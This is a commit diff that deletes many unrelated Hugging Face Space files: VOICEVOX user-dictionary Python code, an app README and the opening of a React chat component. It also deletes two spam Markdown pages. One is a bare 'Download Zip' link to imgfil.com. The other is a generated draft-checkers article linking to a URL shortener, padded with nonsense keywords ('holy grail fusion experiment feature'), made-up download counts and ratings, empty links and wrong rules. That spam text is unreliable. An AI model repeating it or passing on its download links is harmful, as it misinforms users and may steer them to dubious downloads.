Commit fde2cf7
Parent(s): 2014994
Update parquet files (step 56 of 397)
This view is limited to 50 files because it contains too many changes.
- spaces/1gistliPinn/ChatGPT4/Examples/Best Darkest Hour Mods.md +0 -6
- spaces/1phancelerku/anime-remove-background/Download Draft Checkers Play Different Variants of the Game.md +0 -117
- spaces/2ndelement/voicevox/voicevox_engine/user_dict.py +0 -298
- spaces/4th3n4/TraDeX/README.md +0 -23
- spaces/A00001/bingothoo/src/components/chat.tsx +0 -93
- spaces/AIFILMS/Pix2Pix-Video/app.py +0 -248
- spaces/AIZerotoHero-Health4All/03-Datasets/README.md +0 -12
- spaces/ATang0729/Forecast4Muses/Model/Model6/__init__.py +0 -0
- spaces/AchyuthGamer/OpenGPT-Chat-UI/.svelte-kit/types/src/routes/r/[id]/proxy+page.server.ts +0 -35
- spaces/AchyuthGamer/OpenGPT/g4f/Provider/Theb.py +0 -97
- spaces/AgentVerse/agentVerse/agentverse/environments/simulation_env/rules/visibility/sde_team.py +0 -24
- spaces/Agusbs98/automatic-ecg-diagnosis/README.md +0 -12
- spaces/Alican/pixera/options/__init__.py +0 -1
- spaces/Amrrs/DragGan-Inversion/stylegan_human/dnnlib/tflib/tfutil.py +0 -267
- spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_paradigms.py +0 -770
- spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3/deeplabv3_r101-d8_480x480_40k_pascal_context.py +0 -2
- spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/Training_PRO/README.md +0 -56
- spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/edits.py +0 -101
- spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/video/__init__.py +0 -11
- spaces/Anonymous-sub/Rerender/ControlNet/gradio_normal2image.py +0 -99
- spaces/Archan/ArXivAudio/get_pages.py +0 -21
- spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_internal/resolution/resolvelib/reporter.py +0 -80
- spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/importlib_resources/_adapters.py +0 -170
- spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/chardet/metadata/__init__.py +0 -0
- spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/align.py +0 -311
- spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/command/bdist_rpm.py +0 -615
- spaces/Boadiwaa/Recipes/openai/api_resources/error_object.py +0 -22
- spaces/BorisovMaksim/denoising/denoisers/__init__.py +0 -14
- spaces/BradAllgood/fastai_chapter2_new/app.py +0 -28
- spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/.github/pull_request_template.md +0 -8
- spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/modeling/__init__.py +0 -56
- spaces/CVPR/GFPGAN-example/gfpgan/__init__.py +0 -7
- spaces/CVPR/LIVE/thrust/thrust/random/detail/linear_congruential_engine_discard.h +0 -107
- spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/fill.h +0 -22
- spaces/CVPR/LIVE/thrust/thrust/system/cuda/detail/set_operations.h +0 -1998
- spaces/CVPR/monoscene_lite/README.md +0 -13
- spaces/CazimirRoman/summarize-your-webpage-api-with-gradio/app.py +0 -35
- spaces/Chatop/Lab10/README.md +0 -13
- spaces/ChrisPreston/diff-svc_minato_aqua/utils/indexed_datasets.py +0 -73
- spaces/ClearLove443/Robby-chatbot/modules/layout.py +0 -44
- spaces/CognitiveLabs/Research-Assistant/processing/text.py +0 -18
- spaces/DAMO-NLP-SG/Video-LLaMA/video_llama/common/config.py +0 -468
- spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/_core/_eventloop.py +0 -153
- spaces/Dagfinn1962/stablediffusion-articlera/index.html +0 -271
- spaces/Dinoking/Guccio-AI-Designer/netdissect/segviz.py +0 -283
- spaces/ECCV2022/bytetrack/tools/interpolation.py +0 -143
- spaces/EPFL-VILAB/MultiMAE/utils/taskonomy/__init__.py +0 -1
- spaces/EtTKSf/uu/Dockerfile +0 -13
- spaces/FawnPythn/andite-anything-v4.0/app.py +0 -3
- spaces/Finnone/stabilityai-stablelm-tuned-alpha-7b/app.py +0 -3
spaces/1gistliPinn/ChatGPT4/Examples/Best Darkest Hour Mods.md
DELETED
@@ -1,6 +0,0 @@
-<h2>best darkest hour mods</h2><br /><p><b><b>Download Zip</b> ⚙ <a href="https://imgfil.com/2uxXcd">https://imgfil.com/2uxXcd</a></b></p><br /><br />
-
-4d29de3e1b<br />
-<br />
-<br />
-<p></p>
spaces/1phancelerku/anime-remove-background/Download Draft Checkers Play Different Variants of the Game.md
DELETED
@@ -1,117 +0,0 @@
-
-<h1>Download Draft Checkers: A Classic Strategy Board Game for Your PC</h1>
-<p>Do you love playing board games? Do you enjoy challenging your mind and logic? Do you want to have fun with your friends or family? If you answered yes to any of these questions, then you should try playing draft checkers. Draft checkers, also known as draughts or checkers, is a classic strategy board game that you can play on your PC. In this article, we will tell you everything you need to know about draft checkers, including its history, rules, benefits, challenges, and how to download it for your PC.</p>
-<h2>What is draft checkers?</h2>
-<p>Draft checkers is a group of strategy board games for two players that involve diagonal moves of uniform game pieces and mandatory captures by jumping over opponent pieces. The most common version of draft checkers is played on an 8x8 board with 12 pieces per player, but there are many other variations with different board sizes, number of pieces, and rules. The objective of draft checkers is to capture all of your opponent's pieces or block them from making any legal moves.</p>
-<h2>download draft checkers</h2><br /><p><b><b>DOWNLOAD</b> — <a href="https://jinyurl.com/2uNMy0">https://jinyurl.com/2uNMy0</a></b></p><br /><br />
-<h3>The history and origin of draft checkers</h3>
-<p>Draft checkers is one of the oldest board games in the world, dating back to ancient times. The earliest evidence of draft checkers was found in Mesopotamia, around 3000 BC. The game was also played by the ancient Egyptians, Greeks, Romans, Persians, Chinese, Indians, and Arabs. The modern version of draft checkers was developed in France in the 12th century, and spread to other parts of Europe and America. Draft checkers became popular among people of all ages and social classes, and was considered a game of skill and intelligence.</p>
-<h3>The rules and variations of draft checkers</h3>
-<p>The basic rules of draft checkers are simple: each player has 12 pieces (usually black or white) that are placed on the dark squares of an 8x8 board. The players take turns moving one piece diagonally forward to an adjacent empty square. If a player can jump over an opponent's piece to an empty square behind it, they must do so and capture that piece. A piece that reaches the opposite end of the board becomes a king or queen, which can move and jump in any direction. The game ends when one player has no more pieces or legal moves.</p>
-<p>However, there are many variations of draft checkers that have different rules and features. Some of the most common variations are:</p>
-<ul>
-<li>International draughts: played on a 10x10 board with 20 pieces per player.</li>
-<li>Brazilian draughts: played on an 8x8 board with flying kings that can move any distance along unblocked diagonals.</li>
-<li>Turkish draughts: played on an 8x8 board with pieces that move orthogonally (horizontally or vertically) and capture by jumping over two pieces at a time.</li>
-<li>Canadian checkers: played on a 12x12 board with 30 pieces per player.</li>
-<li>Pool checkers: played on an 8x8 board with pieces that can move and capture backwards.</li>
-</ul>
-<p>You can choose the variation that suits your preference and skill level, or try them all to challenge yourself and have more fun.</p>
-<h3>The benefits and challenges of draft checkers</h3>
-<p>Draft checkers is not only a fun and entertaining game, but also a beneficial and challenging one. Some of the benefits of playing draft checkers are:</p>
-<ul>
-<li>It improves your logical thinking and problem-solving skills, as you have to plan your moves and anticipate your opponent's moves.</li>
-<li>It enhances your memory and concentration, as you have to remember the positions and rules of the game.</li>
-<li>It stimulates your creativity and imagination, as you have to come up with new strategies and tactics to win the game.</li>
-<li>It reduces your stress and anxiety, as you have to focus on the game and forget about your worries.</li>
-<li>It strengthens your social skills and relationships, as you can play with your friends or family, or make new friends online.</li>
-</ul>
-<p>Some of the challenges of playing draft checkers are:</p>
-<ul>
-<li>It requires patience and perseverance, as you have to deal with losing and learning from your mistakes.</li>
-<li>It demands attention and discipline, as you have to follow the rules and respect your opponent.</li>
-<li>It tests your intelligence and confidence, as you have to face different levels of difficulty and competition.</li>
-</ul>
-<p>Draft checkers is a game that can help you grow as a person and have fun at the same time.</p>
-<h2>How to download draft checkers for your PC?</h2>
-<p>If you want to play draft checkers on your PC, you will need to download it from a reliable source or website. There are many options available online, but not all of them are safe and secure. Some of them may contain viruses, malware, or spyware that can harm your PC or steal your personal information. Therefore, you should be careful and choose wisely when downloading draft checkers for your PC.</p>
-<p>Download draughts checkers game app<br />
-How to download checkers by Dalmax for Windows 10<br />
-Download free checkers game for Android<br />
-Best checkers game to download for kids<br />
-Download checkers 10x10 board game<br />
-Download checkers with custom rules option<br />
-Download checkers with different rule sets<br />
-Download checkers with multiplayer mode<br />
-Download checkers with AI difficulty levels<br />
-Download checkers with undo function<br />
-Download draughts HD for Windows 10<br />
-Download draughts checkerboard game<br />
-Download draughts with international rules<br />
-Download draughts with Brazilian rules<br />
-Download draughts with pool rules<br />
-Download draughts with Spanish rules<br />
-Download draughts with Russian rules<br />
-Download draughts with Portuguese rules<br />
-Download draughts with Czech rules<br />
-Download draughts with Turkish rules<br />
-Download draughts with Thai rules<br />
-Download checkers | Draughts game by MGGAMES<br />
-Download classic checkers game for PC<br />
-Download checkers game with realistic graphics<br />
-Download checkers game with offline mode<br />
-Download checkers game with data encryption<br />
-Download checkers game with data deletion option<br />
-Download checkers game with trailer video<br />
-Download checkers game with ratings and reviews<br />
-Download checkers game with in-app purchases<br />
-Download checkers game with ads-free option<br />
-Download checkers game with strategy tips<br />
-Download checkers game with analysis tool<br />
-Download checkers game with board flipping feature<br />
-Download checkers game with net energy gain feature<br />
-Download checkers game with holy grail fusion experiment feature<br />
-Download checkers game with mini sun feature<br />
-Download checkers game with 100 million°C feature<br />
-Download checkers game with 30 seconds feature<br />
-Download checkers game with Korea Institute of Fusion Energy feature</p>
-<h3>The best sources and websites to download draft checkers</h3>
-<p>To help you find the best sources and websites to download draft checkers for your PC, we have compiled a list of some of the most popular and trusted ones. Here they are:</p>
-<h4><a href="">Checkers | Draughts game - Apps on Google Play</a></h4>
-<p>This is one of the best apps to play draft checkers on your PC. It has over 10 million downloads and 4.5 stars rating on Google Play. It offers different modes, levels, themes, boards, pieces, rules, and languages. You can play against the computer or online with other players. You can also customize the game according to your preferences. To download this app, you will need an Android emulator such as BlueStacks or NoxPlayer on your PC.</p>
-<h4><a href="">Download Checkers Draughts Game 4.4.1 for Windows - FileHippo</a></h4>
-<p>This is another great option to play draft checkers on your PC. It is a free software that you can download from FileHippo, a reputable website that provides safe and secure downloads. It has over 100 thousand downloads and 3.9 stars rating on FileHippo. It features different variations of draft checkers such as American, International, Russian, Brazilian, Pool, Turkish, etc. You can play against the computer or with another player on the same PC. You can also adjust the difficulty level and speed of the game.</p>
-<h4><a href="">Draft game | Free Downloads Games - ONLINESOLN</a></h4>
-<p>This is a simple and easy way to play draft checkers on your PC. It is a free online game that you can access from any browser without downloading anything. It has over 50 thousand plays and 4 stars rating on ONLINESOLN, a website that provides free online games for everyone. It features a classic version of draft checkers with an 8x8 board and 12 pieces per player. You can play against the computer or with another player online. You can also undo or redo your moves if you make a mistake.</p>
-<h3>The steps and tips to install and play draft checkers on your PC</h3>
-<p>Now that you know some of the best sources and websites to download draft checkers for your PC, you may wonder how to install and play it on your PC. Don't worry, we have got you covered. Here are the steps and tips to install and play draft checkers on your PC:</p>
-<h4>Step 1: Choose your preferred source and website to download draft checkers</h4>
-<p>The first step is to choose your preferred source and website to download draft checkers for your PC. You can use any of the sources and websites we mentioned above, or you can search for other options online. However, make sure that the source and website you choose is reliable, safe, and secure. You can check the reviews, ratings, comments, and feedback of other users to verify the quality and credibility of the source and website.</p>
-<h4>Step 2: Download the draft checkers file or app to your PC</h4>
-<p>The next step is to download the draft checkers file or app to your PC. Depending on the source and website you choose, you may need to create an account, sign in, or register before downloading. You may also need to agree to the terms and conditions, privacy policy, or license agreement of the source and website. After that, you can click on the download button or link and save the draft checkers file or app to your PC. You may need to choose a location or folder where you want to save the file or app.</p>
-<h4>Step 3: Install the draft checkers file or app on your PC</h4>
-<p>The third step is to install the draft checkers file or app on your PC. To do this, you need to locate the draft checkers file or app on your PC and double-click on it. You may need to grant permission or access to run the file or app on your PC. You may also need to follow the instructions or steps on the screen to complete the installation process. You may need to choose a destination or location where you want to install the file or app.</p>
-<h4>Step 4: Launch the draft checkers file or app and start playing</h4>
-<p>The final step is to launch the draft checkers file or app and start playing. To do this, you need to find the draft checkers icon or shortcut on your PC and click on it. You may need to wait for a few seconds for the file or app to load and open. After that, you can choose the mode, level, theme, board, piece, rule, and language of the game. You can also invite or join other players online if you want to play with them. Then, you can start playing draft checkers on your PC and have fun.</p>
-<h4>Tip 1: Adjust the settings and preferences of the draft checkers file or app according to your needs</h4>
-<p>One tip that can help you enjoy playing draft checkers on your PC is to adjust the settings and preferences of the draft checkers file or app according to your needs. You can access the settings and preferences menu from the main screen or menu of the file or app. You can change various aspects of the game such as sound, music, graphics, speed, difficulty, etc. You can also enable or disable notifications, updates, ads, etc. You can also reset or restore the default settings and preferences if you want.</p>
-<h4>Tip 2: Learn the basic strategies and tactics of draft checkers to improve your skills</h4>
-<p>Another tip that can help you enjoy playing draft checkers on your PC is to learn the basic strategies and tactics of draft checkers to improve your skills. You can find various resources online that can teach you how to play draft checkers better such as tutorials, guides, videos, blogs, forums, etc. You can also practice playing draft checkers regularly with different opponents and challenges. You can also learn from your mistakes and feedback from other players. By doing this, you can become a better player of draft checkers.</p>
-<h2>Conclusion</h2>
-<p>Draft checkers is a classic strategy board game that you can play on your PC. It has a rich history, diverse rules, multiple benefits, and exciting challenges. It is easy to download, install, and play draft checkers on your PC. You just need to choose a reliable source or website to download draft checkers, follow the steps and tips to install and play draft checkers, and adjust the settings and preferences of the game according to your needs. You can also learn the basic strategies and tactics of draft checkers to improve your skills and have more fun. Draft checkers is a game that can keep you entertained, challenged, and satisfied for hours. So, what are you waiting for? Download draft checkers for your PC today and enjoy playing this classic strategy board game.</p>
-<h2>FAQs</h2>
-<p>Here are some of the frequently asked questions about draft checkers:</p>
-<ul>
-<li>Q: Is draft checkers free to download and play on PC?</li>
-<li>A: Yes, draft checkers is free to download and play on PC. However, some sources or websites may require you to create an account, sign in, or register before downloading. Some files or apps may also contain ads, in-app purchases, or premium features that may require payment.</li>
-<li>Q: Is draft checkers safe and secure to download and play on PC?</li>
-<li>A: Yes, draft checkers is safe and secure to download and play on PC. However, you should be careful and choose a reliable source or website to download draft checkers. You should also scan the file or app for viruses, malware, or spyware before installing it on your PC.</li>
-<li>Q: Is draft checkers compatible with all PCs?</li>
-<li>A: Yes, draft checkers is compatible with all PCs. However, you may need to check the system requirements and specifications of the file or app before downloading it on your PC. You may also need to update your PC's software, drivers, or hardware to ensure optimal performance of the game.</li>
-<li>Q: Can I play draft checkers offline on PC?</li>
-<li>A: Yes, you can play draft checkers offline on PC. However, you may need to download the file or app first before playing it offline. You may also need an internet connection to access some features or functions of the game such as online multiplayer mode, updates, etc.</li>
-<li>Q: Can I play draft checkers with other players online on PC?</li>
-<li>A: Yes, you can play draft checkers with other players online on PC. However, you may need an internet connection and an account or profile to access the online multiplayer mode of the game. You may also need to invite or join other players online through the game's interface or platform.</li>
-</ul></p> 197e85843d<br />
-<br />
-<br />
spaces/2ndelement/voicevox/voicevox_engine/user_dict.py
DELETED
@@ -1,298 +0,0 @@
|
|
1 |
-
import json
|
2 |
-
import sys
|
3 |
-
import threading
|
4 |
-
import traceback
|
5 |
-
from pathlib import Path
|
6 |
-
from typing import Dict, List, Optional
|
7 |
-
from uuid import UUID, uuid4
|
8 |
-
|
9 |
-
import numpy as np
|
10 |
-
import pyopenjtalk
|
11 |
-
from fastapi import HTTPException
|
12 |
-
from pydantic import conint
|
13 |
-
|
14 |
-
from .model import UserDictWord, WordTypes
|
15 |
-
from .part_of_speech_data import MAX_PRIORITY, MIN_PRIORITY, part_of_speech_data
|
16 |
-
from .utility import engine_root, get_save_dir, mutex_wrapper
|
17 |
-
|
18 |
-
root_dir = engine_root()
|
19 |
-
save_dir = get_save_dir()
|
20 |
-
|
21 |
-
if not save_dir.is_dir():
|
22 |
-
save_dir.mkdir(parents=True)
|
23 |
-
|
24 |
-
default_dict_path = root_dir / "default.csv"
|
25 |
-
user_dict_path = save_dir / "user_dict.json"
|
26 |
-
compiled_dict_path = save_dir / "user.dic"
|
27 |
-
|
28 |
-
|
29 |
-
mutex_user_dict = threading.Lock()
|
30 |
-
mutex_openjtalk_dict = threading.Lock()
|
31 |
-
|
32 |
-
|
33 |
-
@mutex_wrapper(mutex_user_dict)
|
34 |
-
def write_to_json(user_dict: Dict[str, UserDictWord], user_dict_path: Path):
|
35 |
-
converted_user_dict = {}
|
36 |
-
for word_uuid, word in user_dict.items():
|
37 |
-
word_dict = word.dict()
|
38 |
-
word_dict["cost"] = priority2cost(
|
39 |
-
word_dict["context_id"], word_dict["priority"]
|
40 |
-
)
|
41 |
-
del word_dict["priority"]
|
42 |
-
converted_user_dict[word_uuid] = word_dict
|
43 |
-
# 予めjsonに変換できることを確かめる
|
44 |
-
user_dict_json = json.dumps(converted_user_dict, ensure_ascii=False)
|
45 |
-
user_dict_path.write_text(user_dict_json, encoding="utf-8")
|
46 |
-
|
47 |
-
|
48 |
-
@mutex_wrapper(mutex_openjtalk_dict)
|
49 |
-
def update_dict(
|
50 |
-
default_dict_path: Path = default_dict_path,
|
51 |
-
user_dict_path: Path = user_dict_path,
|
52 |
-
compiled_dict_path: Path = compiled_dict_path,
|
53 |
-
):
|
54 |
-
random_string = uuid4()
|
55 |
-
tmp_csv_path = save_dir / f".tmp.dict_csv-{random_string}"
|
56 |
-
tmp_compiled_path = save_dir / f".tmp.dict_compiled-{random_string}"
|
57 |
-
|
58 |
-
try:
|
59 |
-
# 辞書.csvを作成
|
60 |
-
csv_text = ""
|
61 |
-
if not default_dict_path.is_file():
|
62 |
-
print("Warning: Cannot find default dictionary.", file=sys.stderr)
|
63 |
-
return
|
64 |
-
default_dict = default_dict_path.read_text(encoding="utf-8")
|
65 |
-
if default_dict == default_dict.rstrip():
|
66 |
-
default_dict += "\n"
|
67 |
-
csv_text += default_dict
|
68 |
-
user_dict = read_dict(user_dict_path=user_dict_path)
|
69 |
-
for word_uuid in user_dict:
|
70 |
-
word = user_dict[word_uuid]
|
71 |
-
csv_text += (
|
72 |
-
"{surface},{context_id},{context_id},{cost},{part_of_speech},"
|
73 |
-
+ "{part_of_speech_detail_1},{part_of_speech_detail_2},"
|
74 |
-
+ "{part_of_speech_detail_3},{inflectional_type},"
|
75 |
-
+ "{inflectional_form},{stem},{yomi},{pronunciation},"
|
76 |
-
+ "{accent_type}/{mora_count},{accent_associative_rule}\n"
|
77 |
-
).format(
|
78 |
-
surface=word.surface,
|
79 |
-
context_id=word.context_id,
|
80 |
-
cost=priority2cost(word.context_id, word.priority),
|
81 |
-
part_of_speech=word.part_of_speech,
|
82 |
-
part_of_speech_detail_1=word.part_of_speech_detail_1,
|
83 |
-
part_of_speech_detail_2=word.part_of_speech_detail_2,
|
84 |
-
part_of_speech_detail_3=word.part_of_speech_detail_3,
|
85 |
-
inflectional_type=word.inflectional_type,
|
86 |
-
inflectional_form=word.inflectional_form,
|
87 |
-
stem=word.stem,
|
88 |
-
yomi=word.yomi,
|
89 |
-
pronunciation=word.pronunciation,
|
90 |
-
accent_type=word.accent_type,
|
91 |
-
mora_count=word.mora_count,
|
92 |
-
accent_associative_rule=word.accent_associative_rule,
|
93 |
-
)
|
94 |
-
tmp_csv_path.write_text(csv_text, encoding="utf-8")
|
95 |
-
|
96 |
-
# 辞書.csvをOpenJTalk用にコンパイル
|
97 |
-
pyopenjtalk.create_user_dict(str(tmp_csv_path), str(tmp_compiled_path))
|
98 |
-
if not tmp_compiled_path.is_file():
|
99 |
-
raise RuntimeError("辞書のコンパイル時にエラーが発生しました。")
|
100 |
-
|
101 |
-
# コンパイル済み辞書の置き換え・読み込み
|
102 |
-
pyopenjtalk.unset_user_dict()
|
103 |
-
tmp_compiled_path.replace(compiled_dict_path)
|
104 |
-
if compiled_dict_path.is_file():
|
105 |
-
pyopenjtalk.set_user_dict(str(compiled_dict_path.resolve(strict=True)))
|
106 |
-
|
107 |
-
except Exception as e:
|
108 |
-
print("Error: Failed to update dictionary.", file=sys.stderr)
|
109 |
-
traceback.print_exc(file=sys.stderr)
|
110 |
-
raise e
|
111 |
-
|
112 |
-
finally:
|
113 |
-
# 後処理
|
114 |
-
if tmp_csv_path.exists():
|
115 |
-
tmp_csv_path.unlink()
|
116 |
-
if tmp_compiled_path.exists():
|
117 |
-
tmp_compiled_path.unlink()
|
118 |
-
|
119 |
-
|
120 |
-
@mutex_wrapper(mutex_user_dict)
|
121 |
-
def read_dict(user_dict_path: Path = user_dict_path) -> Dict[str, UserDictWord]:
|
122 |
-
if not user_dict_path.is_file():
|
123 |
-
return {}
|
124 |
-
with user_dict_path.open(encoding="utf-8") as f:
|
125 |
-
result = {}
|
126 |
-
for word_uuid, word in json.load(f).items():
|
127 |
-
# cost2priorityで変換を行う際にcontext_idが必要となるが、
|
128 |
-
# 0.12以前の辞書は、context_idがハードコーディングされていたためにユーザー辞書内に保管されていない
|
129 |
-
# ハードコーディングされていたcontext_idは固有名詞を意味するものなので、固有名詞のcontext_idを補完する
|
130 |
-
if word.get("context_id") is None:
|
131 |
-
word["context_id"] = part_of_speech_data[
|
132 |
-
WordTypes.PROPER_NOUN
|
133 |
-
].context_id
|
134 |
-
word["priority"] = cost2priority(word["context_id"], word["cost"])
|
135 |
-
del word["cost"]
|
136 |
-
result[str(UUID(word_uuid))] = UserDictWord(**word)
|
137 |
-
|
138 |
-
return result
|
139 |
-
|
140 |
-
|
141 |
-
def create_word(
|
142 |
-
surface: str,
|
143 |
-
pronunciation: str,
|
144 |
-
accent_type: int,
|
145 |
-
word_type: Optional[WordTypes] = None,
|
146 |
-
priority: Optional[int] = None,
|
147 |
-
) -> UserDictWord:
|
148 |
-
if word_type is None:
|
149 |
-
word_type = WordTypes.PROPER_NOUN
|
150 |
-
if word_type not in part_of_speech_data.keys():
|
151 |
-
raise HTTPException(status_code=422, detail="不明な品詞です")
|
152 |
-
if priority is None:
|
153 |
-
priority = 5
|
154 |
-
if not MIN_PRIORITY <= priority <= MAX_PRIORITY:
|
155 |
-
raise HTTPException(status_code=422, detail="優先度の値が無効です")
|
156 |
-
pos_detail = part_of_speech_data[word_type]
|
157 |
-
return UserDictWord(
|
158 |
-
surface=surface,
|
159 |
-
context_id=pos_detail.context_id,
|
160 |
-
priority=priority,
|
161 |
-
part_of_speech=pos_detail.part_of_speech,
|
162 |
-
part_of_speech_detail_1=pos_detail.part_of_speech_detail_1,
|
163 |
-
part_of_speech_detail_2=pos_detail.part_of_speech_detail_2,
|
164 |
-
part_of_speech_detail_3=pos_detail.part_of_speech_detail_3,
|
165 |
-
inflectional_type="*",
|
166 |
-
inflectional_form="*",
|
167 |
-
stem="*",
|
168 |
-
yomi=pronunciation,
|
169 |
-
pronunciation=pronunciation,
|
170 |
-
accent_type=accent_type,
|
171 |
-
accent_associative_rule="*",
|
172 |
-
)
|
173 |
-
|
174 |
-
|
175 |
-
def apply_word(
|
176 |
-
surface: str,
|
177 |
-
pronunciation: str,
|
178 |
-
accent_type: int,
|
179 |
-
word_type: Optional[WordTypes] = None,
|
180 |
-
priority: Optional[int] = None,
|
181 |
-
user_dict_path: Path = user_dict_path,
|
182 |
-
compiled_dict_path: Path = compiled_dict_path,
|
183 |
-
) -> str:
|
184 |
-
word = create_word(
|
185 |
-
surface=surface,
|
186 |
-
pronunciation=pronunciation,
|
187 |
-
accent_type=accent_type,
|
188 |
-
word_type=word_type,
|
189 |
-
priority=priority,
|
190 |
-
)
|
191 |
-
user_dict = read_dict(user_dict_path=user_dict_path)
|
192 |
-
word_uuid = str(uuid4())
|
193 |
-
user_dict[word_uuid] = word
|
194 |
-
write_to_json(user_dict, user_dict_path)
|
195 |
-
update_dict(user_dict_path=user_dict_path, compiled_dict_path=compiled_dict_path)
|
196 |
-
return word_uuid
|
197 |
-
|
198 |
-
|
199 |
-
def rewrite_word(
|
200 |
-
word_uuid: str,
|
201 |
-
surface: str,
|
202 |
-
pronunciation: str,
|
203 |
-
accent_type: int,
|
204 |
-
word_type: Optional[WordTypes] = None,
|
205 |
-
priority: Optional[int] = None,
|
206 |
-
user_dict_path: Path = user_dict_path,
|
207 |
-
compiled_dict_path: Path = compiled_dict_path,
|
208 |
-
):
|
209 |
-
word = create_word(
|
210 |
-
surface=surface,
|
211 |
-
pronunciation=pronunciation,
|
212 |
-
accent_type=accent_type,
|
213 |
-
word_type=word_type,
|
214 |
-
priority=priority,
|
215 |
-
)
|
216 |
-
user_dict = read_dict(user_dict_path=user_dict_path)
|
217 |
-
if word_uuid not in user_dict:
|
218 |
-
        raise HTTPException(status_code=422, detail="UUIDに該当するワードが見つかりませんでした")
    user_dict[word_uuid] = word
    write_to_json(user_dict, user_dict_path)
    update_dict(user_dict_path=user_dict_path, compiled_dict_path=compiled_dict_path)


def delete_word(
    word_uuid: str,
    user_dict_path: Path = user_dict_path,
    compiled_dict_path: Path = compiled_dict_path,
):
    user_dict = read_dict(user_dict_path=user_dict_path)
    if word_uuid not in user_dict:
        raise HTTPException(status_code=422, detail="IDに該当するワードが見つかりませんでした")
    del user_dict[word_uuid]
    write_to_json(user_dict, user_dict_path)
    update_dict(user_dict_path=user_dict_path, compiled_dict_path=compiled_dict_path)


def import_user_dict(
    dict_data: Dict[str, UserDictWord],
    override: bool = False,
    user_dict_path: Path = user_dict_path,
    default_dict_path: Path = default_dict_path,
    compiled_dict_path: Path = compiled_dict_path,
):
    # Type-check the imported entries, just to be safe
    for word_uuid, word in dict_data.items():
        UUID(word_uuid)
        assert type(word) == UserDictWord
        for pos_detail in part_of_speech_data.values():
            if word.context_id == pos_detail.context_id:
                assert word.part_of_speech == pos_detail.part_of_speech
                assert (
                    word.part_of_speech_detail_1 == pos_detail.part_of_speech_detail_1
                )
                assert (
                    word.part_of_speech_detail_2 == pos_detail.part_of_speech_detail_2
                )
                assert (
                    word.part_of_speech_detail_3 == pos_detail.part_of_speech_detail_3
                )
                assert (
                    word.accent_associative_rule in pos_detail.accent_associative_rules
                )
                break
        else:
            raise ValueError("対応していない品詞です")
    old_dict = read_dict(user_dict_path=user_dict_path)
    if override:
        new_dict = {**old_dict, **dict_data}
    else:
        new_dict = {**dict_data, **old_dict}
    write_to_json(user_dict=new_dict, user_dict_path=user_dict_path)
    update_dict(
        default_dict_path=default_dict_path,
        user_dict_path=user_dict_path,
        compiled_dict_path=compiled_dict_path,
    )


def search_cost_candidates(context_id: int) -> List[int]:
    for value in part_of_speech_data.values():
        if value.context_id == context_id:
            return value.cost_candidates
    raise HTTPException(status_code=422, detail="品詞IDが不正です")


def cost2priority(context_id: int, cost: conint(ge=-32768, le=32767)) -> int:
    cost_candidates = search_cost_candidates(context_id)
    # Return the priority corresponding to the closest value in cost_candidates
    # Reference: https://qiita.com/Krypf/items/2eada91c37161d17621d
    # Together with priority2cost, this means a hand-edited cost in the dictionary
    # file is overwritten with the cost of the nearest priority
    return MAX_PRIORITY - np.argmin(np.abs(np.array(cost_candidates) - cost))


def priority2cost(
    context_id: int, priority: conint(ge=MIN_PRIORITY, le=MAX_PRIORITY)
) -> int:
    cost_candidates = search_cost_candidates(context_id)
    return cost_candidates[MAX_PRIORITY - priority]
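The cost↔priority mapping above can be exercised standalone. In the sketch below, `MAX_PRIORITY` and the `cost_candidates` list are hypothetical stand-ins for the real per-part-of-speech data; only the snapping logic mirrors the functions above:

```python
import numpy as np

MAX_PRIORITY = 10  # hypothetical value for this sketch

# Hypothetical cost candidates for one part of speech, one per priority level,
# indexed so that index 0 maps to priority MAX_PRIORITY ... wait, the reverse:
# priority p reads cost_candidates[MAX_PRIORITY - p].
cost_candidates = [8000, 7200, 6400, 5600, 4800, 4000, 3200, 2400, 1600, 800, 0]

def cost2priority(cost: int) -> int:
    # Snap an arbitrary cost to the nearest candidate, then map to a priority.
    return MAX_PRIORITY - int(np.argmin(np.abs(np.array(cost_candidates) - cost)))

def priority2cost(priority: int) -> int:
    return cost_candidates[MAX_PRIORITY - priority]

# Round-tripping a priority through cost is the identity...
assert all(cost2priority(priority2cost(p)) == p for p in range(MAX_PRIORITY + 1))
# ...while an arbitrary cost is snapped to the closest candidate (4790 -> 4800).
assert cost2priority(4790) == cost2priority(4800)
```

This is why hand-editing a cost in the compiled dictionary has no lasting effect: the next round trip rewrites it with the candidate cost of the nearest priority.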
spaces/4th3n4/TraDeX/README.md
DELETED
@@ -1,23 +0,0 @@
---
title: TraDeX
emoji: 📊
colorFrom: red
colorTo: pink
sdk: gradio
sdk_version: 3.39.0
app_file: app.py
pinned: false
license: agpl-3.0
---

# TraDeX

This is a demo of the TraDeX app, a TFT and CNN-LSTM based app for stock price prediction.

## How to use this app

1. Upload the CSV file of the company whose stock price you wish to predict. (NOTE: the CSV file should contain the same columns as the sample file available in the app.)
2. Click "Submit" and wait for the prediction to be made.
3. You'll get the results as a CSV file; download it and you're done!

---
Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
spaces/A00001/bingothoo/src/components/chat.tsx
DELETED
@@ -1,93 +0,0 @@
'use client'

import { useCallback, useEffect, useMemo, useState } from 'react'
import { useAtom } from 'jotai'
import Image from 'next/image'
import { cn } from '@/lib/utils'
import { ChatList } from '@/components/chat-list'
import { ChatPanel } from '@/components/chat-panel'
import { WelcomeScreen } from '@/components/welcome-screen'
import { ChatScrollAnchor } from '@/components/chat-scroll-anchor'
import { ToneSelector } from './tone-selector'
import { ChatHeader } from './chat-header'
import { ChatSuggestions } from './chat-suggestions'
import { bingConversationStyleAtom } from '@/state'
